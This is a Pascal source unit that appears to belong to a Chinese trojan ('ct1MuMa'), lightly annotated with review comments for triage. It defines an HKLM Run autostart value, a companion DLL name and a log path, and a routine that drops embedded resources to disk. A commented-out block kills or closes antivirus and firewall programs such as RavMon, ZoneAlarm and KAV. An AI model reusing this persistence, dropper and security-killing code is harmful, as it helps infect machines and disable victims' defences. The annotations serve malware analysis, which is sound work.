📄 unithooktype.pas
unit UnitHookType;
interface
uses windows, TLHelp32,reg,sysutils2;
const
// Short build tag; most names below are derived from it by concatenation.
sname='ct1';
// Names of two Windows executables. How they are used is not visible in this unit.
fileRundll32 = 'rundll32.exe';
fileInternat = 'Internat.exe';
// Registry sub-path; evaluates to 'Software\Hacker软件\ct1 MM\'.
// Presumably the program's own settings key - confirm against the unit that reads it.
regpath = 'Software\Hacker软件\'+sname+' MM\';
// Companion DLL file name; evaluates to 'ct1dll.dll'.
file2 = sname+'dll.dll';
// Evaluates to 'ct1 mapfile'. Presumably the name of a shared file-mapping object - confirm.
MappingFileName = sname+' mapfile';
// Evaluates to 'ct1MuMa'. Presumably a window class name - confirm.
ClassName = sname+'MuMa';
// Trap = True; // True = trap-style hook, False = import-table patching style
// MaxRegHKey = $100;
// NOTE(review): RootKey + Regpath1 + RegValue together name a value 'loadMect1' under the
// HKLM ...\CurrentVersion\Run autostart key. The registry write itself is not in this unit.
// For triage, the artefacts these constants resolve to are that Run value, 'ct1dll.dll'
// and the log file 'c:\gamect1.txt'.
RootKey = HKEY_LOCAL_MACHINE;
Regpath1 = 'Software\Microsoft\Windows\CurrentVersion\Run';
// Regpath2 = 'Software\Microsoft\Windows\CurrentVersion\Run\';
RegValue = 'loadMe'+sname;
// Default target of WriteDat; evaluates to 'c:\gamect1.txt'.
LogFile='c:\game'+sname+'.txt';
procedure WriteDat(s: string; datfile: string = logfile);
function GetModalName(processid: Thandle;ext:string=''): string;
procedure ExtractRes(ResType, ResName, ResNewName: string);
implementation
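{ Appends the line s (plus CR/LF) to datfile.

  s       - text to append; a CR/LF pair is added by this routine.
  datfile - target file; defaults to the LogFile constant.

  The file is never created here: when datfile does not exist the call is a
  no-op, so the presence of the file acts as the on/off switch for logging.
  All failures are swallowed on purpose (best-effort logging). }
procedure WriteDat(s: string; datfile: string = logfile);
var
  h: integer;
begin
  try
    if not fileexists(datfile) then exit; // file creation is disabled: h := filecreate(datfile);
    h := fileopen(datfile, fmOpenWrite);
    // Validate the handle before using it; the original called fileseek first.
    if h = -1 then exit;
    try
      fileseek(h, 0, 2); // origin 2 = end of file, i.e. append
      s := s + #$0D + #$0A;
      FileWrite(h, s[1], length(s));
    finally
      // Release the handle even if the write raises.
      FileClose(h);
    end;
  except
    // Deliberately silent: logging must never disturb the caller.
  end;
end;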
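{ Returns the extension of FileName including the leading dot, or '' when the
  last path component has none.

  The scan runs backwards from the end of the string and stops at the first
  path or drive delimiter. Without that stop a dot inside a directory name
  (e.g. 'C:\dir.v2\file') was reported as the start of the extension. }
function ExtractFileExt(const FileName: string): string;
var
  I: Integer;
begin
  result := '';
  for I := length(FileName) downto 1 do
    case FileName[I] of
      '.':
        begin
          result := copy(FileName, I, maxint);
          exit;
        end;
      // Reached the directory part: the file name itself has no extension.
      '\', '/', ':':
        exit;
    end;
end;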
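{ Returns the path of the first module of process processid whose extension is
  '.EXE' or, when ext is non-empty, equal to ext (case-insensitive).

  processid - process identifier passed to CreateToolhelp32Snapshot.
  ext       - optional additional extension to accept, including the dot.

  Returns '' when the snapshot cannot be taken or no module matches. }
function GetModalName(processid: Thandle;ext:string=''): string;
var
  ModuleListHandle: THandle;
  ModuleStruct: TMODULEENTRY32;
  Yn: boolean;
  path: string;
begin
  result := '';
  ModuleListHandle := CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, processid);
  // The snapshot fails for processes the caller may not inspect; the original
  // walked and closed the invalid handle in that case.
  if ModuleListHandle = INVALID_HANDLE_VALUE then exit;
  try
    // dwSize must be set before the first Module32First call.
    ModuleStruct.dwSize := sizeof(ModuleStruct);
    yn := Module32First(ModuleListHandle, ModuleStruct);
    while yn do
    begin
      path := extractfileext(ModuleStruct.szExePath);
      if (ansicomparetext(path, '.EXE') = 0) or
         ((ext <> '') and (ansicomparetext(path, ext) = 0)) then
      begin
        result := ModuleStruct.szExePath;
        break;
      end;
      yn := Module32Next(ModuleListHandle, ModuleStruct);
    end;
  finally
    CloseHandle(ModuleListHandle);
  end;
end;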
{procedure Killpro(s: string);
var
lppe: tprocessentry32;
sshandle: thandle;
hh: hwnd;
found: boolean;
begin
sshandle := createtoolhelp32snapshot(TH32CS_SNAPALL, 0); //
lppe.dwSize := Sizeof(lppe);
found := process32first(sshandle, lppe);
while found do
begin
if (uppercase(extractfilename(lppe.szExeFile)) = s) or
(uppercase(lppe.szExeFile) = s) then
begin
hh := OpenProcess(PROCESS_ALL_ACCESS, true, lppe.th32ProcessID);
TerminateProcess(hh, 0);
end;
// writedat(lppe.szExeFile,'c:\game.txt');
found := process32next(sshandle, lppe);
end;
CloseHandle(sshandle);
end; }
{procedure Killer;
var
s, Desktop: integer;
str: array[0..100] of char;
begin
// s := findwindow(pchar('TForm1'), pchar('密码防盗专家 综合版'));
// Sendmessage(s, $0010, 0, 0);
s := findwindow(pchar('RavMonClass'), pchar('RavMon.exe'));
Sendmessage(s, $0010, 0, 0);
s := findwindow('Tapplication', '天网防火墙个人版');
Sendmessage(s, $0010, 0, 0);
s := findwindow('Tapplication', '天网防火墙企业版');
Sendmessage(s, $0010, 0, 0);
s := 0;
Desktop := GetDesktopWindow;
repeat
s := findwindowex(Desktop, s, 'TForm1', nil);
getwindowtext(s, str, 9);
if str = '木马克星' then
sendmessage(s, $0010, 0, 0);
until s = 0;
s := 0;
Desktop := GetDesktopWindow;
repeat
s := findwindowex(Desktop, s, 'TForm1', nil);
getwindowtext(s, str, 7);
if str = '噬菌体' then
sendmessage(s, $0010, 0, 0);
until s = 0;
s := findwindow(pchar('TfLockDownMain'), nil);
Sendmessage(s, $0010, 0, 0);
s := findwindow(pchar('ZAFrameWnd'), pchar('ZoneAlarm'));
Sendmessage(s, $0010, 0, 0);
Killpro('EGHOST.EXE');
Killpro('MAILMON.EXE');
Killpro('KAVPFW.EXE');
Killpro('IPARMOR.EXE');
KillZhuanJia;
end; }
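{ Writes a resource embedded in the running module (hInstance) to a file.

  ResType    - resource type name.
  ResName    - resource name.
  ResNewName - path of the file to write; an existing file is replaced.

  The call is best-effort: a missing resource or a file that cannot be created
  makes it return silently without writing anything.

  NOTE(review): this routine puts module-embedded bytes on disk at a path the
  caller chooses. Which resource and path are used is decided outside this
  unit; on a host under investigation, a file written this way will match the
  resource section of the parent binary. }
procedure ExtractRes(ResType, ResName, ResNewName: string);
var
  HResInfo: THandle;
  HGlobal: THandle;
  FMemory: Pointer;
  FSize: Longint;
  handle: THandle;
  Wsize: longword;

  // Locates and locks the resource, filling HResInfo, HGlobal, FMemory and FSize.
  // Returns false when any step fails.
  function Initialize(Instance: THandle; Name, ResType: PChar): boolean;
  begin
    result := false;
    HResInfo := FindResource(Instance, Name, ResType);
    if HResInfo = 0 then Exit;
    HGlobal := LoadResource(Instance, HResInfo);
    if HGlobal = 0 then Exit;
    FMemory := LockResource(HGlobal);
    FSize := SizeOfResource(Instance, HResInfo);
    // A nil pointer means the lock failed; the original went on to write from it.
    result := FMemory <> nil;
  end;

begin
  if not Initialize(hInstance, PChar(ResName), PChar(ResType)) then exit;
  try
    if fileexists(ResNewName) then Deletefile(pchar(ResNewName));
    try
      handle := CreateFile(PChar(ResNewName), GENERIC_READ or GENERIC_WRITE,
        0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
      // CreateFile reports failure with INVALID_HANDLE_VALUE; the original
      // passed the unchecked handle to WriteFile and CloseHandle.
      if handle <> INVALID_HANDLE_VALUE then
      try
        WriteFile(handle, FMemory^, FSize, Wsize, nil);
      finally
        CloseHandle(handle);
      end;
    except
      // Deliberately silent, as in the original.
    end;
  finally
    UnlockResource(HGlobal);
    FreeResource(HGlobal);
  end;
end;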
{function DirectoryExists(const Directory: string): Boolean;
var
Code: Integer;
begin
Code := GetFileAttributes(PChar(Directory));
Result := (Code <> -1) and (FILE_ATTRIBUTE_DIRECTORY and Code <> 0);
end; }
end.